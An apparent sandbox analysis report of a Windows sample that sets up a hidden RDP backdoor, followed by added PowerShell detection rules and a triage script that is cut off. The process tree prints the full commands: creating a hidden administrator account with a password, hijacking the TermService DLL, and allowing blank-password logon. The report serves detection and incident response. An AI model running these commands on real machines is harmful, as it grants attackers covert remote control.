Analysis

max time kernel: 120s
max time network: 128s
platform: windows7_x64
resource: win7-en-20211208
submitted: 13-02-2022 11:12

Static task: static1
Behavioral task: behavioral1
  Sample: b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
  Resource: win10v2004-en-20220112

General

Target: b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
Size: 424KB
MD5: afeac971ffe5bab0bf3da53291b523fe
SHA1: f1686e5d05dfb82662cea2907b2e9685d6641755
SHA256: b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2
SHA512: a065544135927cd13c547faf19e0135e7ad3f84b503f99ae4f82628643aadca6eabfa3ab7025bbc9f1efce854b6114db71d63cac8ff20b789d3385f238d1cd04
Malware Config
Signatures

Executes dropped EXE (1 IoC)
  pid 968  j4dsucc1.exe

Modifies Windows Firewall (1 TTP)

Possible privilege escalation attempt (6 IoCs)
  pid 1768  icacls.exe
  pid 1632  takeown.exe
  pid 1060  icacls.exe
  pid 648   icacls.exe
  pid 1592  takeown.exe
  pid 1604  icacls.exe

Sets DLL path for service in the registry (2 TTPs)
  (the ServiceDll write for TermService; see the reg.exe entry in the process tree below)

Allows Network login with blank passwords (1 TTP, 1 IoC)
  Allows local user accounts with blank passwords to access the device from the network.
  reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0"

Modifies file permissions (1 TTP, 6 IoCs)
  pid 1632  takeown.exe
  pid 1060  icacls.exe
  pid 648   icacls.exe
  pid 1592  takeown.exe
  pid 1604  icacls.exe
  pid 1768  icacls.exe

Drops file in Program Files directory (2 IoCs)
  j4dsucc1.exe: File opened for modification C:\Program Files\Common Files\Services\rdpwrap.ini
  j4dsucc1.exe: File opened for modification C:\Program Files\Common Files\Services\rdpwrap.dll

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  (This is the sandbox's generic description for the signature; nothing else in this report shows encryption or mass file modification, so treat the ransomware wording as a heuristic, not a finding.)

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Kills process with taskkill (1 IoC)
  pid 1104  taskkill.exe

Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid 968  j4dsucc1.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid 1688  b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
  (the same pid/process entry is recorded 64 times; the sandbox caps the list at 64)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege  pid 1688  b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
  Token: SeDebugPrivilege  pid 1104  taskkill.exe

Suspicious use of SetWindowsHookEx (4 IoCs)
  pid 1688  b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe (3 entries)
  pid 968   j4dsucc1.exe

Suspicious use of WriteProcessMemory (64 IoCs)
  Recorded as "PID <source> wrote to memory of <target>". The sandbox logs one entry per call, so each parent/child pair appears several times; collapsed here with counts (64 entries in total, the list is capped at 64):
  1688 b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe -> 820 cmstp.exe (3)
  684 cmd.exe -> 968 j4dsucc1.exe (4)
  968 j4dsucc1.exe -> 652 cmd.exe (4)
  968 j4dsucc1.exe -> 1832 cmd.exe (4)
  968 j4dsucc1.exe -> 1444 net.exe (4)
  968 j4dsucc1.exe -> 1704 net.exe (4)
  968 j4dsucc1.exe -> 852 cmd.exe (4)
  1832 cmd.exe -> 1768 schtasks.exe (4)
  852 cmd.exe -> 584 choice.exe (4)
  968 j4dsucc1.exe -> 2028 cmd.exe (4)
  2028 cmd.exe -> 916 choice.exe (4)
  1704 net.exe -> 1532 net1.exe (4)
  1444 net.exe -> 1632 net1.exe (4)
  2028 cmd.exe -> 1064 net.exe (4)
  1064 net.exe -> 1720 net1.exe (4)
  2028 cmd.exe -> 1604 net.exe (4)
  1604 net.exe -> 1616 net1.exe (1, truncated by the cap)
  Note: PIDs are reused during the run (1768 is schtasks.exe here and icacls.exe under "Possible privilege escalation attempt"; 1632 and 1604 likewise), so correlate on image name and parent, not on PID alone.
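Taken one at a time the signatures above are weak (a `reg add` to fDenyTSConnections is also what an administrator's RDP-enable script does); what marks this run is that almost all of them fire together from one process tree. The PowerShell below is an added example, not code from the report or from the sample: it classifies process command lines (the CommandLine field of Security event 4688 or Sysmon event 1) against the categories seen here. The rule names are my own, and the sample lines are constructed by copying commands from the process tree of this report.

```powershell
# Added example: classify process command lines against the RDP-enablement tradecraft
# seen in this run. PowerShell -match is case-insensitive, so no (?i) is needed.
$Rules = [ordered]@{
    'termservice_servicedll_hijack' = 'Services\\TermService\\Parameters.*\bServiceDll\b'
    'rdp_connections_enabled'       = '\bfDenyTSConnections\b.*/d\s+0\b'
    'rdp_multi_session'             = '\bfSingleSessionPerUser\b.*/d\s+0\b'
    'blank_password_network_logon'  = '\bLimitBlankPasswordUse\b.*/d\s+0\b'
    'credssp_oracle_downgrade'      = '\bAllowEncryptionOracle\b.*/d\s+2\b'
    'rdp_firewall_group_enabled'    = 'advfirewall\s+firewall\s+set\s+rule\s+group=.*enable=yes'
    'local_account_created'         = '\bnet1?\s+user\s+\S+\s+\S+\s+/add\b'
    'admin_group_member_added'      = '\bnet1?\s+localgroup\s+"?(Administrators|Administradores)"?\s+\S+\s+/add\b'
    'rdp_group_member_added'        = '\bnet1?\s+localgroup\s+"?(Remote Desktop Users|Usuarios de escritorio remoto)"?\s+.+/add\b'
    'account_hidden_from_logon_ui'  = 'Winlogon\\SpecialAccounts\\UserList.*/d\s+0\b'
    'takeown_in_program_files'      = '^\s*takeown\b.*Program Files'
    'logon_task_highest_rl'         = 'schtasks\s+/create\b.*/sc\s+onlogon\b.*/rl\s+highest\b'
}

function Get-RdpEnablementIndicators {
    # Returns one object per command line that matched at least one rule.
    param([Parameter(Mandatory)][string[]]$CommandLine)
    foreach ($line in $CommandLine) {
        $hits = foreach ($rule in $Rules.GetEnumerator()) {
            if ($line -match $rule.Value) { $rule.Key }
        }
        if ($hits) {
            [pscustomobject]@{ Indicators = @($hits); CommandLine = $line }
        }
    }
}

# Constructed sample: command lines copied from the process tree of this report,
# plus one benign line (choice) that must produce no hit.
$sample = @(
    'reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f',
    'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f',
    'schtasks /create /tn "lst64" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f',
    'net user SysWOW64 t0or9368 /add',
    'net localgroup Administradores SysWOW64 /add',
    'netsh advfirewall firewall set rule group="Escritorio remoto" new enable=Yes',
    'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SysWOW64 /t REG_DWORD /d 0 /f',
    'choice /n /c y /d y /t 3'
)

$findings = Get-RdpEnablementIndicators -CommandLine $sample
$findings | Format-Table -AutoSize -Wrap

# Score by distinct classes: any one line is explainable, many at once from one
# parent process within seconds is not.
$classes = $findings | ForEach-Object { $_.Indicators } | Sort-Object -Unique
'{0} of {1} indicator classes matched' -f $classes.Count, $Rules.Count
```

In a SIEM the same rules would be grouped by parent process and a short time window; the report shows the whole sequence completing within one cmd.exe chain, so a threshold of three or more classes per parent within a minute would have caught it without matching on the Spanish group names specifically.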
Processes

Each entry is the image path followed by its command line; [n] is the depth in the tree as recorded by the sandbox.

[1] C:\Users\Admin\AppData\Local\Temp\b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\b257911d5debbeced8ec162a06760ce49819001a02b5f508d4305f8ef9701df2.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\system32\cmstp.exe
      cmd: "c:\windows\system32\cmstp.exe" /au c:\Users\Public\\552pku1a.inf

[1] C:\Windows\system32\cmd.exe
    cmd: cmd /c start c:\Users\Public\j4dsucc1.exe
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\Users\Public\j4dsucc1.exe
      cmd: c:\Users\Public\j4dsucc1.exe
      - Executes dropped EXE
      - Drops file in Program Files directory
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c mkdir "C:\Program Files\Common Files\Services" & exit
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c schtasks /create /tn "lst64" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f & choice /n /c y /d y /t 3 > nul & schtasks /Run /tn "lst64" & choice /n /c y /d y /t 3 > nul & schtasks /Delete /tn "lst64" /f & exit
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /create /tn "lst64" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f
          - Creates scheduled task(s)
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /Run /tn "lst64"
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\schtasks.exe
          cmd: schtasks /Delete /tn "lst64" /f
    [3] C:\Windows\SysWOW64\net.exe
        cmd: net user "Admin" "
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\net1.exe
          cmd: C:\Windows\system32\net1 user "Admin" "
    [3] C:\Windows\SysWOW64\net.exe
        cmd: net accounts /maxpwage:unlimited
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\net1.exe
          cmd: C:\Windows\system32\net1 accounts /maxpwage:unlimited
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c choice /n /c y /d y /t 30 > nul & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & net start "TermService" & exit
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 30
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net start "TermService"
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 start "TermService"
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: cmd /c choice /n /c y /d y /t 3 > nul & del /f /q "c:\Users\Public\j4dsucc1.exe" & net stop "TermService" /y & net user SysWOW64 t0or9368 /add & choice /n /c y /d y /t 3 > nul & net user SysWOW64 /active:yes & net user SysWOW64 /expires:never & choice /n /c y /d y /t 3 > nul & net user SysWOW64 /passwordchg:no & net user SysWOW64 /logonpasswordchg:no & net localgroup Administradores SysWOW64 /add & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant SysWOW64:F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administradores:F & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant SysWOW64:F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administradores:F & reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f & netsh advfirewall firewall set rule group="Escritorio remoto" new enable=Yes & choice /n /c y /d y /t 3 > nul & net localgroup "Usuarios de escritorio remoto" SysWOW64 /add & net localgroup "Usuarios de escritorio remoto" "Admin" /add & exit
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net stop "TermService" /y
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 stop "TermService" /y
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net user SysWOW64 t0or9368 /add
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 user SysWOW64 t0or9368 /add
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net user SysWOW64 /active:yes
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 user SysWOW64 /active:yes
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net user SysWOW64 /expires:never
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 user SysWOW64 /expires:never
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net user SysWOW64 /passwordchg:no
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 user SysWOW64 /passwordchg:no
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net user SysWOW64 /logonpasswordchg:no
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 user SysWOW64 /logonpasswordchg:no
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net localgroup Administradores SysWOW64 /add
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 localgroup Administradores SysWOW64 /add
      [4] C:\Windows\SysWOW64\takeown.exe
          cmd: TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\SysWOW64\icacls.exe
          cmd: ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant SysWOW64:F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\SysWOW64\icacls.exe
          cmd: ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administradores:F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\SysWOW64\takeown.exe
          cmd: TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll"
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\SysWOW64\icacls.exe
          cmd: ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant SysWOW64:F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\SysWOW64\icacls.exe
          cmd: ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administradores:F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
      [4] C:\Windows\SysWOW64\reg.exe
          cmd: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f
          - Allows Network login with blank passwords
      [4] C:\Windows\SysWOW64\netsh.exe
          cmd: netsh advfirewall firewall set rule group="Escritorio remoto" new enable=Yes
      [4] C:\Windows\SysWOW64\choice.exe
          cmd: choice /n /c y /d y /t 3
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net localgroup "Usuarios de escritorio remoto" SysWOW64 /add
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" SysWOW64 /add
      [4] C:\Windows\SysWOW64\net.exe
          cmd: net localgroup "Usuarios de escritorio remoto" "Admin" /add
        [5] C:\Windows\SysWOW64\net1.exe
            cmd: C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" "Admin" /add

[1] C:\Windows\system32\taskkill.exe
    cmd: taskkill /IM cmstp.exe /F
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\taskeng.exe
    cmd: taskeng.exe {0A7BB5C7-B288-40DD-830F-55443A25FF75} S-1-5-21-3846991908-3261386348-1409841751-1000:VQVVOAJK\Admin:Interactive:[1]
  [2] C:\Windows\System32\WScript.exe
      cmd: C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs"
    [3] C:\Windows\System32\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat
      [4] C:\Windows\system32\reg.exe
          cmd: reg add "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v SysWOW64 /t REG_DWORD /d 0 /f
      [4] C:\Windows\system32\reg.exe
          cmd: reg add "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts" /v SysWOW64 /t REG_DWORD /d 0 /f
      [4] C:\Windows\system32\reg.exe
          cmd: reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SysWOW64 /t REG_DWORD /d 0 /f

Notes on the tree:
- The chain is: the sample runs cmstp.exe /au with an INF dropped to C:\Users\Public (the CMSTP LOLBin launch technique), the cmd.exe that starts c:\Users\Public\j4dsucc1.exe appears as a separate root process rather than as a child of cmstp.exe, and the sample later kills cmstp.exe with taskkill. j4dsucc1.exe then drops rdpwrap.dll/rdpwrap.ini under Program Files, points TermService at rdpwrap.dll via ServiceDll (an RDP Wrapper style termsrv hijack), enables RDP, concurrent sessions and blank-password network logon, creates the local account SysWOW64 with password t0or9368, and deletes its own dropped executable.
- The group names Administradores, Usuarios de escritorio remoto and the firewall rule group Escritorio remoto are Spanish-locale names, so the sample targets Spanish Windows builds. They do not resolve on an English image such as the win7-en resource used here; the report records the commands but not their exit codes, so the group and firewall steps should not be assumed to have succeeded in this run. The net user /add and reg add steps are locale independent.
- The scheduled task lst64 is created with /rl highest, run once, and deleted within six seconds; the taskeng.exe root shows that run. lst.bat writes the SysWOW64 value under SpecialAccounts\UserList = 0, which hides the account from the logon screen. The first two reg add lines in lst.bat use the PowerShell drive prefix HKLM:\, which reg.exe rejects, so only the third write (the UserList key) takes effect.
- The argument to net user "Admin" " is cut off in the capture; the report shows it exactly as above.
- PIDs in this report are reused within the run, so match entries across the Signatures and Processes sections on image name and parent, not PID.
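For a responder the useful output of this tree is the list of host-side artefacts to check on a suspected machine: the TermService ServiceDll hijack, the RDP and Lsa policy values, the hidden SysWOW64 account, privileged group membership, and the dropped files. The PowerShell below is an added example rather than anything from the report or the sample. It assumes Windows 10 or later with PowerShell 5.1 and the Microsoft.PowerShell.LocalAccounts module, run elevated; paths, value names and hashes are the ones recorded in this report, and the function names are my own. It only reports, it does not remediate.

```powershell
# Added example: read-only triage of a host for the artefacts this sample leaves behind.
# Assumes Windows 10+ / PowerShell 5.1 (Get-LocalGroupMember), run from an elevated prompt.

# SHA256 values of the dropped files as recorded in the Downloads section of this report.
$KnownSha256 = @{
    'rdpwrap.dll'  = '798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4'
    'rdpwrap.ini'  = '70A86B3D8E18E3BEC2B33874A84BF09155B896F89DC7088B8A1A8324996EB0AE'
    'lst.vbs'      = '12BC4A0EAE0555B0850CB271BAE5CC660BF7551750E3C7AE9A0FB7843E0D302F'
    'lst.bat'      = '1D1F284C9317E4E268E7EA4B129F557AF90A2CC1861EE62D1B988636856AA552'
    'j4dsucc1.exe' = 'C7667CEB0EFA8AA8B7BD763D779424B5445CA9F56B9E526A395F4044BA4ACC69'
}

function Get-RegValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

function New-Finding {
    param([string]$Check, $Value, [bool]$Suspect)
    [pscustomobject]@{ Check = $Check; Value = $Value; Suspect = $Suspect }
}

function Test-TermServiceDll {
    # TermService should load termsrv.dll from System32; a DLL under Program Files is the hijack seen here.
    $dll = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Services\TermService\Parameters' 'ServiceDll'
    New-Finding 'TermService ServiceDll' $dll ($null -ne $dll -and $dll -notmatch '\\System32\\termsrv\.dll$')
}

function Test-RdpPolicyValues {
    # Value name, key, and the data this sample writes; an exact match is suspect, absence is not.
    $checks = @(
        @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'; Name = 'fDenyTSConnections'; Bad = 0 }
        @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'; Name = 'fSingleSessionPerUser'; Bad = 0 }
        @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'; Name = 'LimitBlankPasswordUse'; Bad = 0 }
        @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters'; Name = 'AllowEncryptionOracle'; Bad = 2 }
        @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'; Name = 'LoggingEnabled'; Bad = 0 }
    )
    foreach ($c in $checks) {
        $v = Get-RegValue $c.Path $c.Name
        New-Finding $c.Name $v ($null -ne $v -and $v -eq $c.Bad)
    }
}

function Get-HiddenLogonAccounts {
    # A DWORD 0 under SpecialAccounts\UserList hides that account from the logon screen.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
    if (-not (Test-Path $key)) { return }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PSPath/PSParentPath metadata
        New-Finding 'Account hidden from logon UI' $p.Name ($p.Value -eq 0)
    }
}

function Get-PrivilegedGroupMembers {
    # Resolve groups by well-known SID: the sample uses Spanish group names, so name-based
    # checks break across locales. S-1-5-32-544 = Administrators, S-1-5-32-555 = Remote Desktop Users.
    foreach ($sid in 'S-1-5-32-544', 'S-1-5-32-555') {
        $groupName = (Get-LocalGroup -SID $sid).Name
        foreach ($m in Get-LocalGroupMember -SID $sid) {
            # SysWOW64 is the account this sample creates; extend the test with your own allow-list.
            New-Finding "Member of $groupName" $m.Name ($m.Name -like '*\SysWOW64')
        }
    }
}

function Get-DroppedArtefacts {
    $paths = @('C:\Program Files\Common Files\Services\rdpwrap.dll',
               'C:\Program Files\Common Files\Services\rdpwrap.ini',
               'C:\Users\Public\j4dsucc1.exe', 'C:\Users\Public\552pku1a.inf')
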